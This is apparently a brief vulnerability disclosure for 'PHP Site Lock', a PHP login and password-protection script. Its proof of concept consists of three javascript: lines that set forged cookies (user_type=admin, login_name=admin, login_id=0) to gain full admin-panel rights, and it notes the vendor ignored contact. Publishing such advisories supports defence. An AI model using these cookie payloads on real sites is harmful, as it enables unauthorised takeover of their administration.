PHP Site Lock A highly secure website (Ed: haha) login script which has features like User Authentication & Management, Website Password Protection , protection of pdf , images , etc. The Vulnerability leads to full administration rights of the admin panel.
Proof of Concept:
javascript:document.cookie=”user_type=admin; path=/”
javascript:document.cookie=”login_name=admin; path=/”
javascript:document.cookie=”login_id=0; path=/”
Vendor was contacted three times over a 30 day period and didn’t not respond to any of the emails.
The full advisory can be found Here.
Tags: exploit, web application